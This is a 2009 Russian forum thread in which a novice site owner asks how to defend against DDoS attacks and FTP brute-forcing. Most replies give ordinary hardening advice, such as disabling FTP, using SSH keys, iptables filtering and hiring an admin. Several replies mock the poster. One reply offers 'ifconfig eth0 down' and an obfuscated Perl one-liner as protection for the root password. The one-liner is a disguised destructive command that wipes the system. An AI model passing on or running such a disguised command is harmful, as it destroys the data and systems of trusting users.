| 05.09.2009, 20:39 | digg | Делаю сайт и за ранее знаю, что на него будут нападать конкуренты.
Будут ломать фтп и возможно будут ддосить.
По ддосу думаю, что можно отсеять часть айпишников разных стран, т.е. запретить доступ всем айпи кроме указанного интервала от и до. Каким способом это лучше всего реализовать и будет ли это эффективно при не очень широком диапазоне допустимых айпи?
Что делать с взломом фтп? Может если 5 раз за минуту неправильно введен пароль с любого айпи, то закрывается доступ к фтп вообще на пол часа? Как такое можно реализовать?
Может есть какая хостинговая компания, которая обеспечивает безопасность от таких атак? Может лучше под это сервер надо?
Вот гугла и яндекса же нельзя заддосить? Почему?
Может еще какие есть толковые способы?:corn: |
| 05.09.2009, 20:43 | lol | я че то не пойму.. первое сентября вроде уже прошло? |
| 05.09.2009, 20:45 | digg | я че то не пойму.. первое сентября вроде уже прошло?
очень информативный ответ
спасибо |
| 05.09.2009, 21:10 | azaza | Делаю сайт и за ранее знаю, что на него будут нападать конкуренты.
Будут ломать фтп и возможно будут ддосить.
По ддосу думаю, что можно отсеять часть айпишников разных стран, т.е. запретить доступ всем айпи кроме указанного интервала от и до. Каким способом это лучше всего реализовать и будет ли это эффективно при не очень широком диапазоне допустимых айпи?
Что делать с взломом фтп? Может если 5 раз за минуту неправильно введен пароль с любого айпи, то закрывается доступ к фтп вообще на пол часа? Как такое можно реализовать?
Может есть какая хостинговая компания, которая обеспечивает безопасность от таких атак? Может лучше под это сервер надо?
Вот гугла и яндекса же нельзя заддосить? Почему?
Может еще какие есть толковые способы?:corn:
открой фтп только для своего ипа.
фтп сервак можно настроить так чтобы можно было ошибиться один раз при вводе пасса.
можно собрать геомодуль для iptables и отсеять страны на фаервола (по поводу ддоса). |
| 05.09.2009, 21:11 | Maximus325 | Дак что непонятного то?
1. Сервер без варинатов
2. Антидос например у yeshost
3. Не ставить ФТП
4. Одмин
5. Оплатить поиск уязвимостей |
| 05.09.2009, 21:14 | ergelaser | 1) взять хостинг с защитой от ДДоСа (например у ЙесХоста).
2) попросить отключить фтп нахуй. |
| 05.09.2009, 21:15 | ergelaser | Максимус опередил :) |
| 05.09.2009, 21:19 | digg | yeshost.ru
или
yeshost.com |
| 05.09.2009, 21:37 | ergelaser | http://yeshost.ru/antiddos |
| 05.09.2009, 21:47 | digg | DDOS до 10Gbps |
| 05.09.2009, 22:00 | mind_user | это очень много, и имхо довольно дешево |
| 06.09.2009, 01:54 | digg | 5. Оплатить поиск уязвимостей
и скока вот этот сервис стоит? и кто может квалифицированно оказать эту услугу? |
| 06.09.2009, 02:05 | Maximus325 | и скока вот этот сервис стоит? и кто может квалифицированно оказать эту услугу?
iSeoBot шарит.
Ну и поспрашивай на бордах хакерских. |
| 06.09.2009, 02:16 | digg | а "Root пароль" на сервере поломать могут?
как защитить? |
| 06.09.2009, 02:29 | gcc | ifconfig eth0 down
хорошее подспорье платным антиддос системам
от сбручивания рута поможет
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' |
| 06.09.2009, 02:33 | gcc | а серьезно
- выключи фтп
- ssh (sftp будешь юзать) повесь на какой нибудь 10503 порт, убери авторизацию по паролю, включи авторизацию по ключам
все |
| 06.09.2009, 02:45 | digg | а серьезно
- выключи фтп
- ssh (sftp будешь юзать) повесь на какой нибудь 10503 порт, убери авторизацию по паролю, включи авторизацию по ключам
все
что за ключи?
вот мне еще насоветовали ознакомиться с типами ддос атак
http://www.antiddos.org/index.php/2008-04-22-11-38-15/34-2008-04-22-13-12-41/74--ddos-
http://www.team-cymru.org/Monitoring/Graphs/
типа чтоб хотя бы околовсячески знать мат часть |
| 06.09.2009, 02:51 | gcc | пиздец, а админа купить не? |
| 06.09.2009, 03:00 | digg | пиздец, а админа купить не?
а где его купить?
вот что-то типа руководства для админа
http://www.antiddos.org/index.php/2008-04-22-11-38-15/34-2008-04-22-13-12-41/83-ddos-------linux---ddos-
читаю и половины не понимаю
где эти iptables писать?
iptables --new-chain car
iptables --insert OUTPUT 1 -p tcp --destination-port 80 -o eth0 --jump car
iptables --append car -m limit --limit 20/sec --jump RETURN
iptables --append car --jump DROP
SYN|ACK - что это?
nginx, lighttpd - непонятные термины |
| 06.09.2009, 03:03 | gcc | у инферно админ есть умный и вроде б недорого
рекомендую тебе почитать соседний тред где демократизатор нечаянно уебал весь сервак
так вот, демократизатор на порядок лучше тебя разбирается в администрировании серверов. |
| 06.09.2009, 03:05 | digg | так вот, демократизатор на порядок лучше тебя разбирается в администрировании серверов.
да я ж не претендую на звание топ админа
у меня есть задача и мне нужно ее решение |
| 06.09.2009, 03:09 | gcc | я к тому что даже такой неглупый человек как демо уебал сервак легким движением руки
если ты впервые видишь слова iptables, nginx, syn, ack - занялся лучше б своим делом, а не ставил антидос на боевой сервер |
| 06.09.2009, 03:15 | digg | я к тому что даже такой неглупый человек как демо уебал сервак легким движением руки
если ты впервые видишь слова iptables, nginx, syn, ack - занялся лучше б своим делом, а не ставил антидос на боевой сервер
админа нанять надо, но понимать что происходит все равно придется
все можно сненсти одним движением руки, но как мне когда-то один мой знакомый сказал, когда я в очередной раз прибежал к нему просить помочь переустановить мне 95ю винду. Я эту фразу потом повторял ни одному человеку: "пока сам не отвоюешь, так и будешь бегать просить помочь"
так на самом деле оно и есть! |
| 06.09.2009, 03:17 | gcc | значит тебе нихуя не важен твой мега проект который будет там крутиться, иначе ты бы не выебывался
ставь дома генту основной системой, ручками, научишься
если я например тачку уебал - я ее отдам в сервис потому что если сам буду чинить - долго она не проживет
если мне надо диз рисовать - я отдам лаве креативным чувакам |
| 06.09.2009, 03:18 | gcc | просто системный администратор - это нихуя не тыкмык по кнопочкам в гуе щелкать |
| 06.09.2009, 03:18 | W84me | чувак, если тебе грозит 10гбит, нахуя ты читаешь чо надо делать, ифконфиги и тп?
админа в зубы и вперед, есть, спамились специалисты.
фтп нахуй, сцп и ключи юзать
антиддос через железки... ток ты правда листать за него устанешь. это не детский сад и цены ниразу.
собственно отсюда и вполне логичный второй пост в топике. |
| 06.09.2009, 03:20 | gcc | никто не даст ему 10гбит, он помоему обкурок обычный |
| 06.09.2009, 03:27 | lol | да хуля тут обсуждать, читайте мой первый пост в топике :)) |
| 06.09.2009, 03:32 | digg | никто не даст ему 10гбит, он помоему обкурок обычный
хватит ругаться
админа в зубы и вперед, есть, спамились специалисты.
антиддос через железки... ток ты правда листать за него устанешь. это не детский сад и цены ниразу.
собственно отсюда и вполне логичный второй пост в топике.
где найти и как определить квалификацию специалиста?
и сколько этот железный антиддос стоит?
вот у этих какие-то защиты:
http://www.antiddos.org/index.php/servises/dedicated-servers
а у этих http://yeshost.ru/antiddos самая невменяемая защита стоит 3600 евро в мес. |
| 06.09.2009, 03:37 | gcc | попробую вежливо:
даже если мы поверим что на тебя будет идти 10гбит 24/7, то никому нахуй не нужно просто будет тебя хостить. либо за суммы от указанной тобой и выше |
| 06.09.2009, 03:45 | digg | попробую вежливо:
даже если мы поверим что на тебя будет идти 10гбит 24/7, то никому нахуй не нужно просто будет тебя хостить. либо за суммы от указанной тобой и выше
логично!
тогда оптимальное решение, если известно, что противники богатые черти и вероятность атаки очень велика?
админ скажем будет, скажем толковый, сервер будет с защитой
все равно ж положат сайт?
вон на других форумах народ говорит Почему нельзя гугл и яндекс заддосить ?))) Кто вам такое сказал ?))) дайте денег - мы вам и пентагон положим)))
А у кого рука поднимется такие великие ресурсы ронять?))
На самом деле у них просто мощное "железо". |
| 06.09.2009, 03:48 | gcc | твой - положат
гугл нет |
| 06.09.2009, 03:48 | Maximus325 | Человек способный сделать проект настолько сильно мешающий таким богатым конкурентам, не будет задавать таких вопросов.
Мне кажется ты продаёшь свой никому не нужный fill.txt генеря бессмысленные посты. |
| 06.09.2009, 03:50 | digg | твой - положат
гугл нет
вот и я о том же
У гугла и яндекса собственные мощные сервера, аппаратная ддос защита и огромный пропускной канал
убухать неоправданное количество средств, а результат будет тот же что и с $0,99 в мес хостингом
что же делать? :eek: |
| 06.09.2009, 03:51 | gcc | прекрати мозг ебать уже
что ты хочешь то? |
| 06.09.2009, 03:55 | digg | прекрати мозг ебать уже
что ты хочешь то?
уже не знаю
информацию я нужную получил, теперь надо подумать
сайт то все равно нужен!
но решения у меня пока реального нет
и не только у меня, как я понял |
| 06.09.2009, 07:28 | mavook | хаха ха ха |
| 06.09.2009, 09:22 | mr. werewolf | но решения у меня пока реального нет
и не только у меня, как я понял
Как дальше жить? =( |
| 06.09.2009, 10:57 | Mr. Style | Парни, да не реагируйте вы на него. Он пишет бред какой-то, ибо нормальный человек уже бы давно понял, что ему нужен админ, и на этом все. |
| 06.09.2009, 11:09 | somebody_ | если будет ДДоС 10Гбит/c то там 1 сервером не отделаешься ... там по любому какой нить мощный кластер нужен ... :) а хардварное решение будет по любому нереально дорогое ...
а создателю топика ... просто нужен админ которые воевал с таким ДДосами ... который за бабло ответить на все его вопросы ...
имхо данный форум мне кажеться не тем местом где могут толково ответить на твои вопросы ... да и никто не будет просто так тебе расжевывать что и как нужно сделать ... |
| 06.09.2009, 11:15 | Hector | Что мешает купить администрируемый сервер типа вебазиллы (сам юзаю) и забить болт на это администрирование? Они там сами всё сделают, и всё будет в порядке. |
| 06.09.2009, 14:08 | digg | http://webazilla.com/
System Administrator
Requirements:
- Cisco certification.
- Experience working with UNIX systems (5+ years).
- Good knowledge of FreeBSD, Linux, (Debian especially) and Solaris.
- Good understanding and comprehension of the foundations and organization of security.
Type:
Full Time / Part Time
Working locally or from a remote location are both possible for this position.
у них админы удаленщики с опытом работы 5 лет с пониманием основ и принципов безопасности?
спавится ли такой человек с задачей? не зассытся ли он с телками в кабаке в самый ответственный момент?
вот еще удаленщики предоставляют свои услуги http://aka-root.com/ за 100$/Месяц
http://www.free-lance.ru/freelancers/?prof=131
тут ваще по 1500-3000 в мес админы
http://yeshost.ru/contact
а как тут у них с админами? |
| 06.09.2009, 14:13 | Drunk Monk | 1500-3000 это на фултайм с соцпакетом и отпуском :)) |
| 06.09.2009, 14:15 | digg | 1500-3000 это на фултайм с соцпакетом и отпуском :))
хе хе
еще и путевку на 2 недели ему на море летом выдавай? )) |
| 06.09.2009, 15:45 | hellman | бля, такого бреда давно не читал.
Воскресенье - хорошее настроение.
дайте мне контакт на ддос в 10гбит за "дешево"=))))) |
| 06.09.2009, 15:51 | Drunk Monk | бля, такого бреда давно не читал.
Воскресенье - хорошее настроение.
дайте мне контакт на ддос в 10гбит за "дешево"=)))))
http://otdel-k.spb.ru/contact.html |
| 06.09.2009, 15:55 | hellman | http://otdel-k.spb.ru/contact.html
я сразу не буду, тут все в курсе просто о этом вопросе. а 30гбит они могут? |
| 06.09.2009, 15:55 | bell | Да хрен с ним с 10ю.
Дайте контакт хотя бы на 5! |
| 06.09.2009, 16:01 | digg | бля, такого бреда давно не читал.
Воскресенье - хорошее настроение.
дайте мне контакт на ддос в 10гбит за "дешево"=)))))
понятия за дешево относительно
для тебя 10к не дешево, для кого-то не дорого
есть задача и способы ее реализации |
| 06.09.2009, 16:11 | hellman | понятия за дешево относительно
для тебя 10к не дешево, для кого-то не дорого
есть задача и способы ее реализации
в РФ 10Гбит ддоса примерно 2-а провайдера всего выдержит. |
| 06.09.2009, 16:19 | Hector | что ж там за проект то) |
| 06.09.2009, 16:20 | Drunk Monk | fuckingshocking 2 :)) |
| 06.09.2009, 16:24 | kanscx | Новый убийца гугла. Но автор жжот, такого бреда действительно давно не было )))) |
| 06.09.2009, 16:56 | hellman | просто чтобы сделать 10гбит ддоса - надо около 30к ботов.
таких людей по пальцам пересчитать можно. |
| 06.09.2009, 17:35 | bell | просто чтобы сделать 10гбит ддоса - надо около 30к ботов.
таких людей по пальцам пересчитать можно.
Ага, по всем двум :) |
| 06.09.2009, 17:56 | digg | что такое бред?
http://slovari.yandex.ru/dict/bse/article/00010/19300.htm?text=%D0%B1%D1%80%D0%B5%D0%B4&encid=bse&stpar1=1.1.1
на всякий случай, чтоб не быть голословным.
Хочу выразить всем участвовавшим огромную благодарность за сотрудничество и информационную помощь! Примерные представления о данной проблеме и основные пути ее решения я получил в кратчайшие сроки, что было очень важно для меня. Спасибо ребята. :)
зы проект белее некуда. может как-нибудь кому-нибудь расскажу... |
| 06.09.2009, 18:20 | hellman | белый проект? и ддос на 10 гбит. ну-ну |
| 06.09.2009, 18:21 | Axel | зы проект белее некуда. может как-нибудь кому-нибудь расскажу...
будем с нетерпением ждать! (http://lurkmore.ru/Всем_похуй) |
| 06.09.2009, 18:23 | digg | белый проект? и ддос на 10 гбит. ну-ну
возможно ддоса вообще не будет, но вероятность есть.
в случае атаки я теперь знаю, что примерно делать
не люблю быть не готовым |
| 06.09.2009, 18:27 | 1een | Да шоп там будет! По продаже тюненый fill.txt и базы для апостера :)) |
| 06.09.2009, 18:29 | rusawm | помимо доса тебя найдут как уебать |
| 06.09.2009, 18:30 | digg | Да шоп там будет! По продаже :))
хе хе
ддос 10гбит/с на сео шоп )) гг ))
нет, это вообще не из области сео. ничего общего
гадать не стоит
модератор нажимай кнопку "закрыть тему" |
| 06.09.2009, 18:31 | Mr. Style | будем с нетерпением ждать! (http://lurkmore.ru/Всем_похуй)
Отжег... :d |
| 06.09.2009, 22:44 | W84me | digg, заканчивай))
тут нет кнопки "бан за личный идиотизм", но модератор повод найдет.
вмемориз в раздел юмор что ли..... |
| 06.09.2009, 22:46 | kiwi | ыхыхы
зачем его банить? такой чудесный топик! |
| 06.09.2009, 22:59 | digg | действительно )))
http://www.youtube.com/watch?v=jMdxOsB9bEc |
| 07.09.2009, 01:10 | kiwi | хорошая песня, кстати, наизусть знаю с 3 лет. Напомнила мне о далёком детстве |
| 07.09.2009, 01:28 | Mr. Style | хорошая песня, кстати, наизусть знаю с 3 лет. Напомнила мне о далёком детстве
Песня-то хорошая, но а к чему она в этом топике? :)) |
| 07.09.2009, 01:31 | 1een | ТС все еще занимается самобичеванием :)) |
| 07.09.2009, 01:39 | azaza | просто чтобы сделать 10гбит ддоса - надо около 30к ботов.
таких людей по пальцам пересчитать можно.
не. он боится что гуглботы устроят ему ддос :hi: |
| 07.09.2009, 01:40 | Mr. Style | ТС все еще занимается самобичеванием :))
Он соревнуется с СуперДоктором: чей топик будет длиннее - size does matter. :)) |
Работает на vBulletin® версия 3.8.4. Copyright ©2000-2010, Jelsoft Enterprises Ltd. Перевод: zCarot
|